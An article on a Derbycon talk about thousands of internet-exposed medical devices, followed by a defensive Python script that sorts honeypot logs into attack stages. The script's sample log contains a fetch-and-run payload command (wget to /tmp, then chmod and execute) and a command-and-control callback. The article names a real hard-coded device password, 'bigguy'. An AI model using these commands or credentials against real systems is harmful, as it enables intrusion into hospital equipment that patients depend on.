A recent talk by Scott Erven and Mark Collao at Derbycon revealed that thousands of medical systems are exposed to attack over the internet. The researchers reported that a large U.S. healthcare organization with 12,000 staff and 3,000 physicians has over 68,000 exposed systems, and they indicate that this is just the tip of the iceberg, as thousands of similar organizations are exposed too.
According to The Register, the exposed systems are not limited to one kind of equipment but cut across a large number of categories: 21 anesthesia, 488 cardiology, 67 nuclear medicine and 133 infusion systems, in addition to 97 MRI scanners and 323 picture archiving and communication (PACS) devices.
To find the exposed systems, the researchers ran searches on the Shodan search engine and identified devices whose administrative interfaces were reachable over the open, public internet. To see who would attack such devices, they also ran honeypots mimicking real MRI and defibrillator machines; these recorded more than 55,000 SSH and web logins and 299 malware payloads, mostly from attackers who had no idea what kind of system they had reached.
Erven, who has five years' experience securing medical devices and is an associate director at Protiviti, paints a very gloomy picture: attackers have access to critical hospital machinery. Narrowing the searches to specialty clinics such as pediatrics and podiatry revealed further cause for concern. Those machines had numerous misconfigurations as well as countless direct attack paths, exposing the clinics to data theft and breaches of patients' privacy.
Collao, a security consultant at NeoHapsis, stated: “You can easily craft an email and send it to the guy who has access to that [medical] device with a payload that will run on the (medical) machine.” This is possible because attackers can build detailed intelligence on medical centers, including the location of specific devices. He further noted that most of these critical systems were running Windows XP or XP Service Pack 2 and likely had no antivirus, leaving them open to execution of custom payloads, the establishment of shells, and lateral pivoting within the network.
GE is one of the affected manufacturers; the report found that its devices granted login access 85% of the time. Some allowed remote root access over Telnet and FTP to nuclear imaging and cardiology systems, and some of these used hard-coded or default passwords such as “bigguy”. The researchers also found that fixes released by manufacturers had not been applied, leaving known, already-patched flaws present in over a hundred medical devices. Erven nevertheless credited GE as the most proactive vendor, both in fixing bugs and in engaging with security researchers.
One reason more devices are becoming exposed is that most hospitals now connect their equipment over Wi-Fi rather than relying on obscure, isolated protocols. For six months the researchers ran honeypots emulating numerous devices, and used a fake Twitter hacker account to draw in would-be attackers. The attackers did not really know what kind of devices they had gained access to, yet they enumerated the systems, dropped payloads and even connected them to command-and-control servers.
In conclusion, this report reveals serious flaws in often critical medical systems. They need to be addressed quickly and conclusively to eliminate the danger they pose, not only to patients but also to the medical organizations themselves.
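To make the attacker behaviour described above concrete (logins with default passwords such as the one cited earlier, enumeration of the host, payload drops, and connections back to command-and-control), here is an added example of triaging honeypot session logs into those stages. It is not code from Erven and Collao's research or from any honeypot product: the log line format, the sample lines, the command patterns and the weak-password list are all constructed for this example.

```python
"""Triage honeypot interaction logs into attacker activity stages.

Added example, not the researchers' code. The log layout below
("<timestamp> <source-ip> <event> <detail>") and every sample line are
constructed for this example; adapt LINE_RE to a real honeypot's format.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed sample log from an emulated device shell (not real traffic).
SAMPLE_LOG = """\
2015-09-26T10:01:02Z 203.0.113.7 login root:bigguy
2015-09-26T10:01:05Z 203.0.113.7 cmd uname -a
2015-09-26T10:01:07Z 203.0.113.7 cmd cat /proc/cpuinfo
2015-09-26T10:01:20Z 203.0.113.7 cmd wget http://198.51.100.9/x86.bin -O /tmp/.x
2015-09-26T10:01:22Z 203.0.113.7 cmd chmod +x /tmp/.x; /tmp/.x
2015-09-26T10:01:30Z 203.0.113.7 connect 198.51.100.9:6667
2015-09-26T11:15:00Z 198.51.100.22 login admin:admin
2015-09-26T11:15:03Z 198.51.100.22 cmd ls -la
2015-09-26T11:15:09Z 198.51.100.22 cmd exit
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) (?P<event>login|cmd|connect) (?P<detail>.*)$")
# Commands that reveal what the attacker has landed on (host enumeration).
ENUM_PATTERNS = [re.compile(p) for p in (
    r"^uname\b", r"^cat /(proc|etc)/", r"^(id|whoami)\b",
    r"^(ifconfig|ip addr|netstat)\b", r"^ps\b", r"^ls\b",
)]
DOWNLOADERS = ("wget", "curl", "tftp", "ftpget", "busybox wget")
URL_RE = re.compile(r"(?:https?|ftp|tftp)://\S+")
# Constructed list: "bigguy" is the default named in the talk, the rest are
# generic factory defaults added here for illustration.
WEAK_PASSWORDS = {"bigguy", "admin", "password", "root", "1234"}


@dataclass
class Session:
    src_ip: str
    credentials: list[str] = field(default_factory=list)
    enumeration: list[str] = field(default_factory=list)
    payload_urls: list[str] = field(default_factory=list)
    connections: list[str] = field(default_factory=list)

    @property
    def stage(self) -> str:
        """Highest stage reached: c2_callback > payload_drop > enumeration > login_only."""
        if self.connections:
            return "c2_callback"
        if self.payload_urls:
            return "payload_drop"
        if self.enumeration:
            return "enumeration"
        return "login_only"

    @property
    def payload_hosts(self) -> set[str]:
        return {h for h in (urlparse(u).hostname for u in self.payload_urls) if h}

    def callback_matches_payload_host(self) -> bool:
        """True when an outbound connection goes to the host that served the payload."""
        return any(c.rsplit(":", 1)[0] in self.payload_hosts for c in self.connections)


def weak_credentials(session: Session) -> list[str]:
    """Logins whose password is on the weak/default list."""
    return [c for c in session.credentials if c.split(":", 1)[-1] in WEAK_PASSWORDS]


def triage(log_text: str) -> dict[str, Session]:
    """Group log lines by source IP and classify what each attacker did."""
    sessions: dict[str, Session] = {}
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # skip malformed lines instead of aborting the whole triage
        s = sessions.setdefault(m["ip"], Session(m["ip"]))
        event, detail = m["event"], m["detail"]
        if event == "login":
            s.credentials.append(detail)
        elif event == "connect":
            s.connections.append(detail)
        else:
            # Split chained commands so "chmod +x x; ./x" is seen as two commands.
            for cmd in (c.strip() for c in detail.split(";")):
                if not cmd:
                    continue
                if any(cmd.startswith(d) for d in DOWNLOADERS):
                    # Record the fetched URL(s), or the raw command if none parsed.
                    s.payload_urls.extend(URL_RE.findall(cmd) or [cmd])
                elif any(p.match(cmd) for p in ENUM_PATTERNS):
                    s.enumeration.append(cmd)
    return sessions


def summarize(sessions: dict[str, Session]) -> list[str]:
    """One report line per attacker, suitable for a daily triage email."""
    return [
        f"{s.src_ip}: stage={s.stage} weak_creds={weak_credentials(s)} "
        f"payloads={s.payload_urls} c2={s.connections}"
        for s in sessions.values()
    ]


if __name__ == "__main__":
    for line in summarize(triage(SAMPLE_LOG)):
        print(line)
```

The stage ordering encodes the escalation the researchers observed: a login alone is noise, a download followed by an outbound connection to the same host is a compromised device calling home. That last check is the signal worth paging on if the "honeypot" is in fact a real infusion pump or imaging workstation.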